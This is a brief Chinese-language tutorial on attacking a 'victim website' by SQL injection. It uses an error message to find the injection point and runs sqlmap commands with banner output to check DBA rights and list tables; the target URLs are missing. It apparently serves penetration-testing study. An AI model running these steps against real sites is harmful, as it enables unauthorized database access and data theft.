SQLMAP之漏洞伺服器
準備工具
1、kali 系統IP 10.10.10.131
2、受害網站
3、使用工具sqlmap
步驟:
1、登入受害網站
網址設定為
出現Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in E:\WWW\techdetail.php on line 8 (這裡就是mysql資料庫,找到sql注入點)
2、使用sqlmap工具子產品進行掃描
[email protected]:~# sqlmap -u
--dbms "mysql"
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20151130}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
3、判斷是否為資料庫管理者使用者
[email protected]:~# sqlmap -u
--dbms "mysql" --is-dba
4、使用 --table參數檢視
[email protected]:~# sqlmap -u
--table
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20151130}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program